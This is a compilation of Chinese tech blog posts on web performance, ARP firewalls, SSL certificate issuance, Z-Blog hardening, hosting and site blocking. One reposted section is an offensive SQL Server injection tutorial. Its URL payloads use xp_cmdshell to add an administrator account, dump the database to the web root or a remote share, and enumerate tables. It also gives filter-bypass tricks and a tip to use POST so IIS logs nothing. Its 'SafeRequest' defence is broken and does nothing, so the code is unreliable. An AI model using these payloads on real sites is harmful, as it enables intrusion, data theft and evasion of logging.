开心网作为一个访问量非常大的网站,网页结构也非常简单,理应做得更小,比如在100k以内。从我的分析中可以看出,主要问题集中在 javascript,gzip和图片上,代码质量总体还可以。当然,我们不仅只是挑刺,也应该看到一些好的地方,如下:
1. 首页处理得比较到位,虽然javascript也没有压缩,但总大小只有108k
2. 文件请求数较少,这个和开心网本身有关,开心网本来就不是一个网页结构复杂的网站,所以文件数自然会比较少了
3. 静态文件和网页分开部署
4. Javascript注释比较好,但不应该发到客户端
重要建议:
1. 开启gzip压缩
2. 压缩javascript及css,并将这些文件缓存起来
最后,这次的分析就写到这里了,就事论事而已,和任何网站及相关的人员没有任何关系,呵呵。
来源:读者Conis投稿,原文地址。版权声明:本文授转月光博客刊登,其他非授权网站媒体转载,需要添加作者网站地址http://iove.net,否则视为侵权。
2013年3月1日星期五
网络安全行业的怪现象
京华时报上报道了一则很有意思的新闻,说某网络安全公司,为了推销其防火墙产品,竟然对一些网络游戏公司的网站发动DDOS攻击,然后向被攻击公司销售自己的防火墙设备,上演了一场贼喊捉贼的闹剧,最终被公安机关绳之以法。
尽管警方已经破获了这起案件,找到了这家安全公司,并将“黑客”抓获,但我想这仅仅是个特例而已,真正没有被抓到的类似所谓的“网络安全公司”实在太多了。
网络安全是个相对的概念,即使配置了安全的服务器,也无法防止别人通过DDOS来攻击。对于大规模的分布式DDOS攻击,目前只能花钱去购买硬件防火墙才能应付。因此,那些做硬件防火墙网络安全公司应该最希望别人的网站被DDOS了。
为什么有些网络安全公司敢于知法犯法,主动去攻击别人呢?这其实是网络安全行业的潜规则,对于高端的网络安全技术,普通的公安机关根本没有能力侦破,因为这方面的技术门槛实在太高,因此公安机关侦破一些网络犯罪行为也需要网络安全公司来协助,这就造成了某些网络安全公司的有恃无恐,因为他们知道,即使他们通过技术手段对别人DDOS攻击和要挟,最终也没有人能管,而被攻击的公司往往都会“哑巴吃黄连”,不得不购买相关安全产品。
这样的公司在中国也不少,我身边就发生过类似的事情,某某安全公司,为了让客户购买其安全产品,故意将该客户公司的主页黑掉,放上一幅色情图片,该客户去公安局报案,公安局也无法独立侦破此案,却要其去联系某某安全公司去调查,迫于无奈,最终该客户不得不购买了这个安全产品,之后该客户公司的主页就再也没有被黑过。
因此中国实在是黑客的“天堂”,最基本的原因是相关法律不健全,执法者相应的技术素质太差。如果执法者拥有足够高的技术水平,并且如果我国也象美国那样,以严厉的手段打击处理一批著名的黑客,那么黑客攻击也不至于象目前这样嚣张了,正因为黑客被抓住的几率实在太低,才引发了当前中国网络安全行业的这些形形色色的“怪现象”。
金山ARP防火墙
我先前曾经介绍过奇虎推出的360免费ARP防火墙,界面虽然简陋,但是我在服务器上使用了这几个月来,感觉还可以。今天发现金山也出了一个ARP防火墙产品,于是也下载下来使用了一下。
我安装使用金山ARP防火墙后的个人感觉,界面比360ARP的要好看一些,功能选项也多一些,不喜欢周鸿祎的可以选择使用这个产品。目前看起来似乎是免费的,不知道以后是否会收费。自己有服务器放在电信机房的,请一定要安装至少一套ARP防火墙产品,否则会死的很惨。
金山ARP防火墙下载地址:http://kad.www.duba.net/kas/KAntiarp.exe
以下是金山公司自己对于金山ARP防火墙的主要功能和特色的介绍:
金山ARP防火墙能够双向拦截ARP欺骗攻击包,监测锁定攻击源,时刻保护局域网用户PC的正常上网数据流向,是一款是适于个人用户的反ARP欺骗保护工具。
网关动态探测+识别——识破伪造的网关地址
动态获取、并分析判断后为受保护PC绑定正确的网关地址,从而时刻保障保护本机上网数据的正确流向。同时也支持用户手动设置绑定网关地址。
网关动态通知——受到ARP欺骗攻击时主动向网关发送数据包,表明合法身份。
双向拦截ARP攻击
拦截来自外部接受或是由本机发出的ARP攻击数据包并提醒用户,保障本机及其它PC的网络通畅。
拦截IP冲突攻击,保护本机不受IP冲突攻击的影响
攻击源追踪锁定——拦截到ARP攻击包后立即追踪攻击源,找出安全威胁源头。
安全模式——让受保护PC在局域网隐身,攻击源无法察觉
解决SSL攻击的方法
SSL的窃听和安全最近颇受关注,吴洪声提出了一种SSL窃听攻击的思路,主要是利用了CA签发证书的一个重大缺陷:只验证目标网站的域名信箱即可签发该网站的证书,因此,只要搞到目标网站的一个信箱,就可以窃取到这个域名的SSL证书。
因此,大多数免费邮箱或公司邮箱的SSL证书都存在网站SSL证书被窃取的可能性,Gmail由于使用mail.google.com而不是www.gmail.com,因此得以幸免于难。然而,有权使用google.com的Google公司的员工依然有可能获取google.com的SSL证书,一旦该证书被用于大规模的域名劫持,后果不堪设想。
如果想要避免这种SSL证书窃取,CA需要修改目前的签发流程,即在签发前需要验证申请者对于该网站具有管理权限,例如,在网站的首页增加一小段隐藏代码,或者在网站上传一个指定的HTML文件,这样,只有真正的网站拥有者才能做这样的操作,非法窃取者即使有了该域名的邮件,也无法获取该域名的证书。
当然,从根本上讲,这个攻击并非对SSL安全协议本身的攻击,只是对其发行机构的攻击,SSL协议目前来说还是安全可靠的。
名词注释:SSL
安全套接字层 (Secure Sockets Layer,SSL) 是一套提供身份验证、保密性和数据完整性的加密技术。SSL 最常用来在 Web 浏览器和 Web 服务器之间建立安全通信通道,用以保障在 Internet 上数据传输之安全,SSL 利用数据加密技术,确保数据在网络上之传输过程中不会被截取及窃听,它也可以在客户端应用程序和 Web 服务之间使用。
2013年2月26日星期二
博客系统的安全设置技巧
我们经常会碰到个人博客被黑客入侵并挂木马的事情,我以前曾经介绍过“服务器的安全配置技巧总结”,但是没有具体结合某个博客程序讲解,今天,我这里就介绍一下在Z-Blog 1.7的系统以及主机可配置的条件下(托管、租用或者合租主机)的系统安全设置。让黑客的入侵变得不那么容易。
首先Windows 2000或者Windows Server必须格式化为NTFS的格式,格式完成后,设置网站硬盘的安全性。C盘为操作系统盘,D盘放常用软件,E盘网站,格式化完成后立刻设置磁盘权限,C盘默认,D盘的安全设置为Administrator和System完全控制,其他用户删除,E盘放网站,设置Administrator和System完全控制,Everyone读取。
将Z-Blog的文件目录复制过来,此时会自动将所有文件设置为Everyone读取,这时,选择DATA目录设置为Everyone修改、读取和写入。选择UPLOAD、INCLUDE、CACHE、POST目录,设置为Everyone读取写入,选择RSS.XML、ATOM.XML文件也设置为Everyone读取写入。
下一步非常关键,就是在IIS管理界面中,选择目录属性,将上面设置的所有“可写”目录的应用程序执行许可都设置为“无”,如下图所示,这样设置之后,可写的目录就无法运行任何ASP或者其他脚本,其意义在于,即使黑客通过某个漏洞上传到了某个可写目录下一段恶意程序代码,这个恶意程序代码依旧无法执行,这就从根本上杜绝了黑客上传木马的可能性。
最后总结一下安全设置的要点,所有ASP程序应该放在只读目录下,可写的目录均不能放置ASP程序,所有可写的目录均不能有执行许可,DATA目录最好能设置为不能下载。按照我所介绍的这样配置之后,Z-Blog系统的安全性就应该是不错的了。
CnBeta暂时被Google封了
今天使用Google搜索的时候,发现CnBeta的网站内容全部都被加上“该网站可能含有恶意软件,有可能会危害您的电脑。”的字样,点击进去后提示“警告- 访问该网站可能会损害您的计算机”,可以说直接从Google进入CnBeta的可能性几乎没有了。
后来了解到一些情况,好像CnBeta所在的机房有ARP攻击,CnBeta正好中招,于是被Google判定网站挂木马,暂时屏蔽了。
遇到这种提示信息后,网站的管理员应该第一时间清除网站内的木马,或者安装ARP防火墙,同时登录“谷歌网站管理员工具”,会在网站管理员工具的“诊断” 标签下看到相关的警告,以及找到帮助您纠正这个问题的信息。如果清除了网站上所有的恶意软件,请访问http://stopbadware.org/home/review 要求复审。一旦复审成功,被标记的网站将不再被标示该警告。
我估计这种情况是机房的ARP欺骗攻击引起的木马,中国总是有很多无耻之徒喜欢搞ARP木马病毒,我自己也遇到过很多次ARP攻击,最后一次被ARP攻击后甚至被百度删除过一次,不过因为发现的处理的比较及时,还没有被Google屏蔽过,之后我安装了奇虎的免费ARP防火墙,之后的ARP攻击就基本被屏蔽了。
使用奇虎的免费ARP防火墙这两个月来,感觉还不错,至少再没有遭到ARP攻击了,因此,托管服务器在电信机房的,请速速安装一下ARP防火墙吧,以免遭到ARP欺骗攻击,如果再被Google判定为“恶意网站”,那样的损失就太大了。
不过奇虎ARP防火墙有个缺点,就是不能以服务的方式运行,而且没有看到日志文件,这点不是很方便,其他都还不错。
微软免费杀毒软件Microsoft Security Essentials
据微软官方网站公告,微软公司28日宣布,其新版杀毒软件Microsoft Security Essentials自明天起可以免费下载。
这是微软提供的免费杀毒软件,可以每天升级,能够抵御最新的病毒、木马等恶意程序。微软表示,这款杀毒软件不会影响用户计算机的运行速度。
微软这次推出的免费杀毒软件,对于目前普遍收费的杀毒软件市场是一大打击,不过短期内这个软件还难以影响主流杀毒软件的市场份额。
除了微软之外,目前市场上还有一些其他厂商提供免费杀毒软件,如360杀毒等。
经过下载试用,Microsoft Security Essentials目前下载需要填写一些客户信息表单,最后下载到的文件进行安装的时候,会联网进行正版验证,如果你的系统不是Windows正版的话,就无法安装这个软件。
访问微软杀毒软件网站: Microsoft Security Essentials
2013年2月25日星期一
Web应用程序的开发步骤
如今已进入了web2.0高速发展的互联网时代,各种互联网的Web应用程序如雨后春笋般出现。那么作为一名Web开发人员,怎样去开发一款优秀的Web应用程序呢?这个问题没有一个简单的答案,甚至那些教育机构都未必能清楚的知道。所以,像大多数在这个领域里的web开发人员一样,我们只是通过去做,去实验才学会了这些。没有人告诉我们如何去做,我们从给自己做点什么东西开始,学会如何开发web应用程序是在这个过程中的一个副产品。这是学习任何语言的一个非常有效的方法。
Web应用程序与网站之间的区别
首先,我要说明,开发一个web应用程序跟开发一个网站是不一样的。虽然在总体上有很大相似之处,但开发它们所需要的时间有巨大的差别。那究竟web应用程序和网站有什么不同呢?通常,维基百科能帮助我们解释这个问题,让我们来看看维基百科是如何定义应用软件的:
应用软件,通常也被称作应用,指的是专门为帮助用户去执行一个或多个相关特定任务而设计的计算机软件。企业软件,会计软件,办公套件,绘图软件,媒体播放器等都属于这种软件。
跟应用软件相对照的是系统软件和中间件,它们管理计算机效能,管理如何跟计算机集成,但通常这些工作并不会直接反映到使用户受益的任务执行上。举个例子,一个不是很恰当的实体类比,应用软件跟系统软件之间的关系就好比一个电灯泡和一个发电厂之间的关系,发电厂(系统软件)只是产生电能,它自己没有任何真正的用途,除非利用一个电灯泡这样的应用工具才能为用户提供服务。
Web应用程序的开发过程
现在特征已经弄清楚了,我们就可以开始定义开发一个web应用程序的整个过程了。当然,这依赖于工程的大小,过程中的某些步骤可能很小,在你的脑海里就能完成这种工作,但把事情整个的了解一下总是有好处的。同时还有一点很重要的你要明白,这篇文章并不会对每个步骤进行深层次的描述。
步骤一:分析
开发一个web应用的第一步是分析你的需求。你此时应该定义出一个尽量周全的你的应用应该提供的功能清单。如果是你为一个客户做这些工作,你需要明白他们想要什么(要确保你们对方都知道对方在说些什么)。从你们的讨论中,你能总结出需求和软件规格。你即使是为自己开发,我也建议你把希望这个web应用能够做的功能写下来。
步骤二:设计
一旦你弄清楚了这个web应用需要做哪些事情,你就可以开始设计了。这个步骤通常会反反复复进行很多次,每一次都把设计细化一些。你第一要做的是画出页面流程图(画在纸上,或使用软件工具,凭各自所好吧。我喜欢用纸,这样我可以做更快速的改变)。页面流程图通常是很抽象的黑白绘画,画出你将要实现的web应用的样子(你可以加一些色彩,但尽量保持简单)。
这个步骤能够让你知道你的应用最终会是个什么样子。跟37signals倡导的相反,我建议使用一些词语描述,适度细化。当我想到一个很好的想法时,或想到事情该如何做时,我会把它标注到纸上(例如,当点击这个按钮时应该使另外一个元素改变或隐藏,我会把这写在流程图上)。
当你对做出的草图满意后,你可以开始制作实体模型了。
实体模型仍然是些图案,但有色彩和细节。最终的实体模型看起来应该像你将要实现的web应用的一个截屏图。如果你为一个客户开发,他会看看这些东西,并给你他的认可。然而,很多人都喜欢跳过这一步(大多数都是非设计人员),他们喜欢直接奔向网页原型。
原型是用HTML开发出来,使用CSS渲染(有时也是有Javascript)。页面布局要做出来,链接能够点,颜色,字体,字体大小要设定好(如果你做了实体模型,这个会很容易)。这一步非常的重要,因为这里所有的东西都能用于你最终的应用中。如果允许的话,在你的原型上做一些可用性测试,从长期的效果来看,这能使你避免大量的失误。
在这个步骤的最后,你基本上就知道了你的web应用是如何组织到一起的了。登录页面有些什么,用户如何从主页转向到各个页面。
步骤三:实现 选择一个框架
现在我们已经知道了要去开发什么东西,那就要把它做出来。这一部分的工作很多,你大部分的时间都要花在这个上面。你第一个要做的决定是如何着手,采用什么样的技术,什么框架。你有很多选择的余地,你需要选出一个适合你的。下面是一个最常用的框架的列表:
- ASP.NET
- PHP 上的任何一个流程的框架
- Python with Django
- Ruby on Rails
没有一个明确的标准说哪个框架最好。它们都各有不同,每个都有自己的长处。最重要的是你要知道它们任何一个都能让你开发出好用的web应用。
开发
一旦你知道了如何去开发,那就要甩开臂膀开干了。这个开发工作可以看作有很多块,但说到底,这都是标准的编程活动了。在后台,你要创建类,对象,服务,过程,以及持久层来把这些对象保存到数据库中。后台是整个应用的核心,对任何应用来说,它跟普通的编程没有什么区别。接着是前台的开发,你现在编写的代码才是真正给用户使用的操作界面。你把后台的程序和原型界面集成到一起,把系统各部分集成到一起。你还可以把你在开发过程中想到的一些很炫的小功能用JavaScript实现。
再说一次,有很多种途径可以实现后台程序。建议你去读一读跟你选择的框架相关的资料,弄清楚如何实现这一部分的工作。通常,这些知识会跟面向对象编程有关,但有些框架正在慢慢的向领域驱动设计发展。
步骤四:打磨抛光
现在应用程序已经开发出来,各个独立的模块也集成到了一起。你需要通过测试来确保你在步骤一中定义的需求和软件规格是否被实现(这个问题在你开发的整个过程中都要记在脑中)。你要确保那些愚蠢的用户不能通过试图做一些你还没有实现的操作而把你的应用弄坏(参考白盒和黑盒测试)。你同时还要确保你的程序能够在各种浏览器里(希望不是IE6)都能正确的运行。
现在也是你做一些小的调整,改进你的应用程序给人的感觉的时候,让它趋于完美。
步骤五:发布和后续工作
这最后一步(但不是就此完结)是发布你的应用,让用户能够真正使用它(如果这个应用是个公众开发的应用,别忘了做新闻宣传)。如果你愿意,先发布一个Beta版,这样只有一小部分用户能够发现你的应用里的大问题(因为你的程序里肯定会有bug),他们会帮助你改进程序的质量。不要忙着增加功能,要专注于把你目前的程序变的稳固。
当经过了beta阶段,你的程序已经变得十分的稳固,听取用户反馈的意见,自己试用一下自己的应用,你可以开始思考如何使应用变的更好。找出不和谐的地方,消除掉。以后每次的迭代都要经过上面所说的五个步骤,但就像我最初说的,你现在已经有了一个可以运行的应用程序,你很容易直接在心里完成这些步骤,直接奔向在代码里测试你的功能。
恭喜,你已经自豪的成为一个web应用程序的作者了。
英文原文:How to develop web applications
中文翻译:晨露博客 投稿
国外虚拟主机空间的过度销售
出于某些方面的考虑,我很早就购买过一些国外的虚拟主机,最近两年我一直都在续费DreamHost的虚拟主机,现在我很遗憾地发现,我这对这家著名虚拟主机服务商的忍耐力已经快接近极限了。
对于DreamHost所遇到的种种问题,我觉得原因归根结底就是一个,那就是DreamHost非常夸张的过度销售(overselling)策略。购买一个DreamHost的虚拟主机,可以绑定无限多的域名,拥有500GB空间,每月流量5000GB,这么夸张的配置真的只要9.95美元吗,我们真能用得到这么多资源吗?
举个我实际的例子,我的月光博客容量几百兆,每月流量大约450G左右,我就已经无法再使用虚拟主机了,我几乎一直都在使用独立服务器了,因为只有独立服务器才能提供这样的流量和CPU支持。同一台服务器,只有一个人使用和有数百号人使用,两者是完全不同的,虚拟主机所能提供的资源是非常有限的,而DreamHost的这种永远无法兑现的虚拟主机只是在欺诈那些网络初学者而已,虚拟主机不可能提供这么大的空间和流量。实际情况也是这样的,除非你的网站全部使用静态HTML文件,否则,你在达到其流量限制的1%前就已经要被他们要求“升级”了。
现在,我就收到了DreamHost的邮件,他们的邮件说,在最近的九天内,我的用户的CPU使用时间上比这个主机上的平均用户多两倍,他们要求我付更多的钱去购买CPU的使用率,升级到DreamHostPS。
实际上,我只是搭建了几个WordPress博客系统和一个Discuz论坛,为了减少CPU负荷和MySQL使用率,我还特意在WordPress上使用了静态化插件,将大部分文件都静态化了,即便如此,在流量大的时候,我还是发现网站经常出现500错误,无法连接MySQL服务器更是家常便饭,我相信WordPress和Discuz系统本身应该不会有什么问题,况且我还做了大量的优化工作,CPU使用率应该不会很高,可是为什么还是得到这样的结果呢?
目前我在DreamHost上所有系统的总流量通常都不大,最近一段时间才达到每天800M流量,总用的使用空间不到1G,离他们的配置要求相差甚远,竟然使用的CPU就已经超过了他们的许可,我就实在不清楚这个主机上的其他用户到底是怎么使用DreamHost的了,我想,除非我全部使用静态HTML做网站,否则是不会达到他们这种苛刻的要求。
我不知道其他人是怎么使用的虚拟主机的,不过我想我对于动态语言以及数据库的优化已经做了非常多的工作了,别人是怎么使用DreamHost的呢?难道其他用户全部都是网站流量非常小,或者全都是静态页面,也不在乎经常宕机,不在乎速度慢,我真是很困惑。
我现在已经受够了DreamHost,我也不会为他们的overselling继续买单了,我开始寻找下一个国外虚拟主机商了,现在,我宁愿选择那种只支持一个域名,每月限制流量在100GB以下的主机,也不会再选择那种可绑定无穷域名,声称每月提供1000GB以上流量的服务商了,否则,那可能将是另外一场噩梦。
最后提一下,我使用SSH登陆后,用下面的语句查询我使用DreamHost的这台服务器的用户数,得出结果:一共有380个Shell用户和1069个FTP用户。
grep -i /home/ /etc/passwd | grep /bin/.*sh$ | wc -l
grep -i /home/ /etc/passwd | wc -l
2013年2月23日星期六
ASP漏洞全接触-高级篇
看完入门篇和进阶篇后,稍加练习,破解一般的网站是没问题了。但如果碰到表名列名猜不到,或程序作者过滤了一些特殊字符,怎么提高注入的成功率?怎么样提高猜解效率?请大家接着往下看高级篇。
第一节、利用系统表注入SQLServer数据库
SQLServer是一个功能强大的数据库系统,与操作系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为注入者提供了一个跳板,我们先来看看几个具体的例子:
①http://Site/url.asp?id=1;exec master..xp_cmdshell "net user name password /add"--
分号;在SQLServer中表示隔开前后两句语句,--表示后面的语句为注释,所以,这句语句在SQLServer中将被分成两句执行,先是Select出ID=1的记录,然后执行存储过程xp_cmdshell,这个存储过程用于调用系统命令,于是,用net命令新建了用户名为name、密码为password的windows的帐号,接着:
②http://Site/url.asp?id=1;exec master..xp_cmdshell "net localgroup name administrators /add"--
将新建的帐号name加入管理员组,不用两分钟,你已经拿到了系统最高权限!当然,这种方法只适用于用sa连接数据库的情况,否则,是没有权限调用xp_cmdshell的。
③http://Site/url.asp?id=1 ;;and db_name()>0
前面有个类似的例子and user>0,作用是获取连接用户名,db_name()是另一个系统变量,返回的是连接的数据库名。
④http://Site/url.asp?id=1;backup database 数据库名 to disk='c:\inetpub\wwwroot\1.db';--
这是相当狠的一招,从③拿到的数据库名,加上某些IIS出错暴露出的绝对路径,将数据库备份到Web目录下面,再用HTTP把整个数据库就完完整整的下载回来,所有的管理员及用户密码都一览无遗!在不知道绝对路径的时候,还可以备份到网络地址的方法(如\\202.96.xx.xx\Share\1.db),但成功率不高。
⑤http://Site/url.asp?id=1 ;;and (Select Top 1 name from sysobjects where xtype='U' and status>0)>0
前面说过,sysobjects是SQLServer的系统表,存储着所有的表名、视图、约束及其它对象,xtype='U' and status>0,表示用户建立的表名,上面的语句将第一个表名取出,与0比较大小,让报错信息把表名暴露出来。第二、第三个表名怎么获取?还是留给我们聪明的读者思考吧。
⑥http://Site/url.asp?id=1 ;;and (Select Top 1 col_name(object_id(‘表名'),1) from sysobjects)>0
从⑤拿到表名后,用object_id(‘表名')获取表名对应的内部ID,col_name(表名ID,1)代表该表的第1个字段名,将1换成2,3,4...就可以逐个获取所猜解表里面的字段名。
以上6点是我研究SQLServer注入半年多以来的心血结晶,可以看出,对SQLServer的了解程度,直接影响着成功率及猜解速度。在我研究SQLServer注入之后,我在开发方面的水平也得到很大的提高,呵呵,也许安全与开发本来就是相辅相成的吧。
第二节、绕过程序限制继续注入
在入门篇提到,有很多人喜欢用'号测试注入漏洞,所以也有很多人用过滤'号的方法来"防止"注入漏洞,这也许能挡住一些入门者的攻击,但对SQL注入比较熟悉的人,还是可以利用相关的函数,达到绕过程序限制的目的。
在"SQL注入的一般步骤"一节中,我所用的语句,都是经过我优化,让其不包含有单引号的;在"利用系统表注入SQLServer数据库"中,有些语句包含有'号,我们举个例子来看看怎么改造这些语句:
简单的如where xtype='U',字符U对应的ASCII码是85,所以可以用where xtype=char(85)代替;如果字符是中文的,比如where name='用户',可以用where name=nchar(29992)+nchar(25143)代替。
第三节、经验小结
1.有些人会过滤Select、Update、Delete这些关键字,但偏偏忘记区分大小写,所以大家可以用selecT这样尝试一下。
2.在猜不到字段名时,不妨看看网站上的登录表单,一般为了方便起见,字段名都与表单的输入框取相同的名字。
3.特别注意:地址栏的+号传入程序后解释为空格,%2B解释为+号,%25解释为%号,具体可以参考URLEncode的相关介绍。
4.用Get方法注入时,IIS会记录你所有的提交字符串,对Post方法做则不记录,所以能用Post的网址尽量不用Get。
5.猜解Access时只能用Ascii逐字解码法,SQLServer也可以用这种方法,只需要两者之间的区别即可,但是如果能用SQLServer的报错信息把值暴露出来,那效率和准确率会有极大的提高。
SQL注入漏洞可谓是"千里之堤,溃于蚁穴",这种漏洞在网上极为普遍,通常是由于程序员对注入不了解,或者程序过滤不严格,或者某个参数忘记检查导致。在这里,我给大家一个函数,代替ASP中的Request函数,可以对一切的SQL注入Say NO,函数如下:
Function SafeRequest(ParaName,ParaType)
--- 传入参数 ---
ParaName:参数名称-字符型
ParaType:参数类型-数字型(1表示以上参数是数字,0表示以上参数为字符)
Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write "参数" & ParaName & "必须为数字型!"
Response.end
End if
Else
ParaValue=replace(ParaValue,"","")
End if
SafeRequest=ParaValue
End function
作者:eNet 出处:eNet硅谷动力
今天终于出院了
今天早上办理完了出院手续。
住院八天,总共住院费用四千多,这时我发现有社会医疗保险的好处了,就是自己只用自费四百多元,其余的钱由社保统筹基金支付。
为此我也研究了一下深圳的社会医疗保险制度,发现有了社会医疗保险,每年住院最多可以由社保局承担12万元(深圳2004年平均工资31000×4)。基本上费用个人只需要支付10%即可,特殊药品或检查(比如CT)除外。这样看来,有了社会医疗保险,“一病回到解放前”的住院经历应该会少一些了。目前深圳大概有一百多万人有社保。如果能够全体劳工都能享有社保,那么医疗产品目前面临的种种问题也可以得到部分解决。
附:深圳医疗保险征收及偿付标准
·征收标准
·偿付标准 一、住院医疗保险 1、住院基本医疗费用由基本医疗保险统筹基金支付90%(退休人员95%); 2、使用特殊医用材料或使用单价在1000元以上的一次性医用材料,以及进行人工器官的安装和置换,由基本医疗保险统筹基金按国产普及型价格支付90%; 3、慢性肾功能衰竭在门诊做透析,器官移植后在门诊用抗排斥药,恶性肿瘤在门诊化疗、放疗、介入治疗或核素治疗的基本医疗费用,由基本医疗保险统筹基金支付90%。 二、综合医疗保险 1、享受住院医疗保险; 2、个人帐户支付门诊基本医疗费用和门诊使用地方补充医疗保险药品目录的药品、诊疗项目的费用; 3、个人帐户用完后,超额部分在市上年度城镇职工平均工资10%以上的门诊基本医疗费用由基本医疗保险统筹基金支付70%,个人自付30%; 4、门诊特殊检查治疗费用由基本医疗保险统筹基金支付80%,个人自付20%; 5、个人帐户积累额达到2个月市上年度城镇职工月平均工资的,超过部分可用于支付自费药,或在定点零售药店购买基本医疗保险药品目录和地方补充医疗保险药品目录范围内的非处方药品。 三、地方补充医疗保险 1、超基本医疗保险统筹基金支付最高限额的基本医疗费用; 2、在住院期间使用地方补充医疗保险药品目录规定的药品和地方补充医疗保险诊疗项目的费用。 以上费用由地方补充医疗保险基金支付85%。 四、生育医疗保险 围产期检查、分娩住院、产后访视、计划生育手术,以上范围的基本医疗费用由生育医疗保险基金全额支付。 五、医疗保险每年度报销最高限额 |
|||||||||||||||||||||||||||||||||||
| 连续参保时间 | 最高限额 | |
| 基本医疗保险 | 地方补充医疗保险 | |
| 不满半年 | 年平工资×0.5 | 0 |
| 满半年不满1年 | 年平工资×1 | 5万元 |
| 满1年不满2年 | 年平工资×2 | 10万元 |
| 满2年不满3年 | 年平工资×3 | 15万元 |
| 满3年以上 | 年平工资×4 | 20万元 |
| 注: |
| 1、生育医疗保险的参保对象仅限于深圳户籍在职员工; 2、“缴费工资”是指员工月工资总额, 员工月工资总额超过市上年度职工月平均工资300%,按月平均工资的300%缴交, 员工月工资总额低于市上年度职工月平均工资60%,按月平均工资的60%缴交。 3、“月(年)平工资”是指市上年度城镇职工月(年)平均工资 |
慨叹FreeBSD和SourceForge被封
为了中国软件业的前途和发展,我呼吁中国电信停止封锁以下两个英文的软件专业技术网站:FreeBSD和SourceForge。
FreeBSD是一个自由的,源自AT&T UNIX的操作系统。可以说它是正统的UNIX后代。FreeBSD是一个完整的操作系统,包含了从开发工具到各种各样的应用程序。它由一个软件开发的核心团队来维护,整个原始程序代码会有组织地进行更新,所以程序代码比较有一致性。FreeBSD主要是由它的核心小组来发布。FreeBSD的目标是提供一个坚如磐石的系统。它的技术性能是有目共睹的,十几年的开发使它成为一个“坚如磐石”的网络操作系统,有许许多多的大网站和ISP在运行着FreeBSD,免费和开放的特性使得它成为商业计算和科学研究的极佳平台。
Google、Yahoo、甚至新浪网等大型网站的服务器都大量使用FreeBSD操作系统。可以说,大型网站服务器使用的操作系统基本上不是FreeBSD就是Linux了。
然而令人不解的是,FreeBSD的官方网站 www.freebsd.org 不知何故长期被中国电信封锁,不让国内人访问。其官方网站是英文的,基本上只有非常专业的技术人员(比如高级网管)才会访问,为什么FreeBSD这样的专业网站都会被封呢?我绞尽脑汁也想不出封他的理由,唯一的解释就是:中国电信对Free这个单词的恐惧已经到了歇斯底里的地步了。
另外一个遭到封杀毒手的专业网站是SourceForge。
SourceForge 是全球最大的开放源代码软件开发平台和仓库。它集成了很多开放源代码应用程序,为软件开发提供了整套生命周期服务。SourceForge.net是开放源代码软件的开发者进行开发管理的集中式场所,也是源代码仓库。大量开源项目在此落户(2005年5月已经超过一百万),包括维基百科使用的MediaWiki,但也包含很多休眠和单个用户的项目。
SourceForge虽然也是英文界面的专业网站,但这个庞大的开放源代码软件仓库也长期被中国电信封锁,封锁的原因据说是里面有一个名为FreeNet的代理服务器的源代码软件项目。
我知道,中国的软件业永远也赶不上发达国家,甚至赶不上印度,其中最主要的原因就是有一大批中国人在系统地残害和阻挠中国软件业的发展,他们热衷于购买国外的软件硬件产品(能捞到回扣?),而对民族软件业的发展百般阻挠,这些人是中国永远的耻辱,做为一个软件开发工程师,我们能够做到的就是牢记这段历史,知耻而后勇,中国软件业才会有希望。
ASP的Blog Roll的代码
今天为Z-Blog写了一个Blog Roll的附加程序。
之所以想写这样的程序,因为目前的Z-Blog的友情链接管理很不方便,而且链接里没有RSS订阅地址,而类似WordPress这样成熟的PHP Blog程序都提供这样的功能,而ASP下的相关资源却非常少,所以只好自己写一个了。
Blog链接我当然首选使用opml格式的文件,绝大多数在线RSS阅读器都支持这种格式的文件导入导出,这段代码的功能是从opml格式的文件里提取出链接,目前的Bloglines,GouGou都提供导出opml格式的文件,我比较常用的FireFox Sage也支持,所以我就直接将Sage导出的opml格式做为数据源了。
这段代码我也不是很满意,因为导出的opml文件里并没有真正的URL地址,只有RSS地址,而根据RSS地址反推URL地址,我用的反推算法是取最后一个/号前面的URL地址,对大部分BLOG都是有效的,但总有几个特别的BSP的RSS找不到正确的URL地址,比如新浪和BLOGCN的RSS地址怪异,就算不出URL地址。feedburner的RSS也不行。
没办法,对于少数几个不行的就只好删除了。
这个程序使用起来很简单。将文件复制到INCLUDE目录下,先将原有的link.asp备份一下,然后将导出的opml文件命名为export.opml,也放到INCLUDE目录下。然后执行makelink.asp,即可将export.opml文件生成为link.asp的链接。
生成的Blog Roll的样例请参见月光博客左边的友情链接部分。链接即包含URL地址也包含RSS订阅地址,是一个专用的BLOG友情链接。
此程序也可用于其他的ASP BLOG程序中。
Blog Roll的程序代码请点这里下载。
英文技术网站全部解封了?
今天上网,发现前一段时间电信封的几个国外英文技术网站全都可以正常访问了。
包括PHP、FreeBSD和SourceForge三个重量级的技术网站目前我都可以访问正常,至于FreeBSD以前那夸张的关键字过滤方式也没有了,这令我感到很欣慰。
我们的权利是由我们自己争取来的,如果这些事情我们谁都不说话,那么这些我们本应该拥有的权利会永远失去,所以我们要努力争取,就目前看,我们是正确的,我们争回了自己的权利。
以后,如果大家发现自己有什么合法的网站上不去,那么如果是被封的话,一定要向电信申请解封,写一份申请解除封锁的材料,包含网站地址、IP、用途等等,向当地的电信局提交这份材料,如果属于误封的话,那么积极申请,相信很快会被有关部门解封的。
下面是cnblog的同学总结的网站解封的经验,供参考。
网站被封了怎么办?
一旦网站被封,当然,严格来说,应该是发现某个网站突然无法访问。首先要做的是,了解是否是服务器或服务商方面出了问题;然后求证一下国内其他地方的朋友以及国外的朋友能否访问。如果都不能访问,那么很可能就是网站被封了。
大多数的人到此或许就开始抱怨,然后逐渐不去使用这个网站了。
但是,我所要说的,正是这以后的办法。
首先,向你的ISP询问无法访问网站的原因。最好直接询问骨干网的网络中心(就是直接拥有国际出口的ISP)。例如,教育网的用户可以直接询问中国教育网网络中心。可以参考一下中国互联网络连接带宽图。ISP一般来说都是很热情的,他们会帮你查询这个网站是否被封锁(你有可能需要提供网站的IP地址)。如果证实被封锁,他会告诉你应该写一封申请解除封锁的材料,说明网站的性质和用途。
说到这里,有几点需要注意:
1. 申请解除网站的封锁状态,并不要求你是网站的拥有者或管理人员,只要你发现某个网站被封锁,而他们确实没有什么反动、××内容(这是出于人身安全和守法的原则),任何人都可以申请解除某个网站的封锁。
2. 执行封锁的部门是什么,是不会告诉你的。(因为这是保密的),不外是被告知是公安部门或者安全部门。封锁是由这些部门直接在国际出口的路由上进行的,ISP很可能也不清楚,无权过问,也不可能由他们直接解除封锁。因此封锁的原因也是无从打听的。
